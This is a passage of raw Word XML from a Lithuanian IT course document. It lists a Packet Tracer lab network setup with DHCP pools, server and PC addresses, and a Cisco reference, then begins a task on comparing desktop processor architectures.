        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>DNS Server – 192.168.4.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DAC7D19" w14:textId="67DE706D" w:rsidR="1E7FE668" w:rsidRPr="005A5C28" w:rsidRDefault="0991CD82" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Start IP Address</w:t>
      </w:r>
      <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>- 192.168.2.2</w:t>
      </w:r>
      <w:r w:rsidR="74476864" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Subnet Mask-255.255.255.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3798502A" w14:textId="77777777" w:rsidR="00D72DCB" w:rsidRPr="005A5C28" w:rsidRDefault="74476864" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Pool Name – Users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13ADE04C" w14:textId="77777777" w:rsidR="00D72DCB" w:rsidRPr="005A5C28" w:rsidRDefault="74476864" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>DG - 192.168.3.1 192.168.4.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265E903C" w14:textId="69483F36" w:rsidR="7400D842" w:rsidRPr="005A5C28" w:rsidRDefault="74476864" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>DNS -192.168.3.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4442C3" w14:textId="5A3F57BC" w:rsidR="7400D842" w:rsidRPr="005A5C28" w:rsidRDefault="74476864" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Start IP Address – 192.168.3.2 Subnet Mask-255.255.255.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108289BF" w14:textId="77777777" w:rsidR="00D72DCB" w:rsidRPr="005A5C28" w:rsidRDefault="00D72DCB" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B0D0DDA" w14:textId="23BF128E" w:rsidR="29255FE5" w:rsidRPr="005A5C28" w:rsidRDefault="23D27478" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Serveris3.</w:t>
      </w:r>
      <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Server-PT http,ftp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76023E82" w14:textId="10EBBFF4" w:rsidR="18EEACA0" w:rsidRPr="005A5C28" w:rsidRDefault="18EEACA0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09CB7338" w14:textId="6909DAA2" w:rsidR="136B8565" w:rsidRPr="005A5C28" w:rsidRDefault="68FBAA84" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>IP Address – 192.168.4.3 Subnet Masl – 255.255.255.0 DG-199.1</w:t>
      </w:r>
      <w:r w:rsidR="040EE7B7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>68.4.1. DNS Server-192.168.4.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D19D41C" w14:textId="37465A5A" w:rsidR="0F044737" w:rsidRPr="005A5C28" w:rsidRDefault="73376BAF" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>HTTP – On</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1C48D1" w14:textId="37465A5A" w:rsidR="02A5FE1F" w:rsidRPr="005A5C28" w:rsidRDefault="73376BAF" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>FTP – On</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C75819D" w14:textId="3C305E35" w:rsidR="18EEACA0" w:rsidRPr="005A5C28" w:rsidRDefault="18EEACA0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="281649ED" w14:textId="77777777" w:rsidR="00D72DCB" w:rsidRPr="005A5C28" w:rsidRDefault="73376BAF" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Asmeninis kompiuteris1.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> PC-PT Direktorius.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D09E8EB" w14:textId="7AEB1875" w:rsidR="02A5FE1F" w:rsidRPr="005A5C28" w:rsidRDefault="73376BAF" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>IP Address –DHCP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FF3C10" w14:textId="625B4573" w:rsidR="2F8F8590" w:rsidRPr="005A5C28" w:rsidRDefault="2F8F8590" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01EDC0D3" w14:textId="454C6F02" w:rsidR="2F8F8590" w:rsidRPr="005A5C28" w:rsidRDefault="73376BAF" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Asmeninis kompiuteris2.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> PC-PT User1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0D6F64" w14:textId="738DD46B" w:rsidR="2F8F8590" w:rsidRPr="005A5C28" w:rsidRDefault="73376BAF" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>IP Address-DHCP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D078C7" w14:textId="440C7F4E" w:rsidR="79BFD9B5" w:rsidRPr="005A5C28" w:rsidRDefault="79BFD9B5" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D37FE7A" w14:textId="738DD46B" w:rsidR="02A5FE1F" w:rsidRPr="005A5C28" w:rsidRDefault="73376BAF" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Asmeninis kompiuteris3.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> PC-PT Direktoriaus pavaduotojas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8BCDD7" w14:textId="738DD46B" w:rsidR="02A5FE1F" w:rsidRPr="005A5C28" w:rsidRDefault="73376BAF" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>IP Address-DHCP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0660DB26" w14:textId="440C7F4E" w:rsidR="460CB4A8" w:rsidRPr="005A5C28" w:rsidRDefault="460CB4A8" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C901578" w14:textId="46011238" w:rsidR="460CB4A8" w:rsidRPr="005A5C28" w:rsidRDefault="73376BAF" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Asmeninis kompiuteris4.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> PC-PT User2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE01201" w14:textId="2227F70B" w:rsidR="460CB4A8" w:rsidRPr="005A5C28" w:rsidRDefault="73376BAF" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>IP Address-DHCP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FEC4C04" w14:textId="2227F70B" w:rsidR="460CB4A8" w:rsidRPr="005A5C28" w:rsidRDefault="460CB4A8" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0328C42C" w14:textId="2227F70B" w:rsidR="460CB4A8" w:rsidRPr="005A5C28" w:rsidRDefault="73376BAF" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Asmeninis kompiuteris5.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> PC-PT Admin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE7090D" w14:textId="2227F70B" w:rsidR="460CB4A8" w:rsidRPr="005A5C28" w:rsidRDefault="73376BAF" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>IP Address-DHCP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A009B0C" w14:textId="2227F70B" w:rsidR="460CB4A8" w:rsidRPr="005A5C28" w:rsidRDefault="460CB4A8" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CA08077" w14:textId="4A5D1510" w:rsidR="02A5FE1F" w:rsidRPr="005A5C28" w:rsidRDefault="73376BAF" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Asmeninis kompiuteris6. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>PC-PT PC5.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029B8EE7" w14:textId="0DBB816E" w:rsidR="02A5FE1F" w:rsidRPr="005A5C28" w:rsidRDefault="73376BAF" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>IP Address-DHCP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26553B0C" w14:textId="2F746F44" w:rsidR="01D0DD04" w:rsidRPr="005A5C28" w:rsidRDefault="01D0DD04" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F80322D" w14:textId="6D6C44B6" w:rsidR="02A5FE1F" w:rsidRPr="005A5C28" w:rsidRDefault="73376BAF" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Asmeninis kompiuteris7.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> PC-PT PC6.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C34B493" w14:textId="0DBB816E" w:rsidR="02A5FE1F" w:rsidRPr="005A5C28" w:rsidRDefault="73376BAF" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>IP Address-DHCP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F319C92" w14:textId="140BC2EE" w:rsidR="01D0DD04" w:rsidRPr="005A5C28" w:rsidRDefault="01D0DD04" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79C2BC15" w14:textId="140BC2EE" w:rsidR="02A5FE1F" w:rsidRPr="005A5C28" w:rsidRDefault="73376BAF" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Asmeninis kompiuteris8.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> PC-PT PC7.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7EA070" w14:textId="140BC2EE" w:rsidR="02A5FE1F" w:rsidRPr="005A5C28" w:rsidRDefault="73376BAF" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>IP Address-DHCP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D2270D" w14:textId="140BC2EE" w:rsidR="009F0677" w:rsidRPr="005A5C28" w:rsidRDefault="009F0677" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EA3BDF6" w14:textId="00E4BA85" w:rsidR="009F0677" w:rsidRPr="005A5C28" w:rsidRDefault="6F216934" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Papildomi informacijos šaltiniai:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076A7909" w14:textId="6DE747AD" w:rsidR="009F0677" w:rsidRPr="005A5C28" w:rsidRDefault="106EAB42" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Configuring Router and Switch Devices</w:t>
      </w:r>
      <w:r w:rsidR="00B9797B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="5F67883F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Cisco. </w:t>
      </w:r>
      <w:r w:rsidR="5F67883F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId42" w:history="1">
        <w:r w:rsidR="6F216934" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.cisco.com/c/en/us/td/docs/security/security_management/cs-mars/4-3/user/guide/local_controller/cfgrtrsw.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="37B8BF31" w14:textId="02620C84" w:rsidR="009F0677" w:rsidRPr="005A5C28" w:rsidRDefault="009F0677" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C08ADA0" w14:textId="208FB8D1" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="4B6091E2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="2E59EAD4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="2F5AEB2E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>užduotis.</w:t>
      </w:r>
      <w:r w:rsidR="2F5AEB2E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="6B14ABD5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>PA</w:t>
      </w:r>
      <w:r w:rsidR="72D6FC1D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>LYGINTI</w:t>
      </w:r>
      <w:r w:rsidR="42924E1D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> STACIONARIŲ KOMPIUTERIŲ</w:t>
      </w:r>
      <w:r w:rsidR="72D6FC1D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> PROCESORIŲ ARCHITEKTŪRĄ</w:t>
      </w:r>
      <w:r w:rsidR="5943619D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46325D1C" w14:textId="5ACEF7AB" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="5943619D"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 xml:space="preserve">UŽDUOTIES SĄLYGA: </w:t>
      </w:r>
      <w:r w:rsidR="002E1838" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="59B51863" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="5837BF78" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>sirin</w:t>
      </w:r>
      <w:r w:rsidR="006670B4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>kite</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
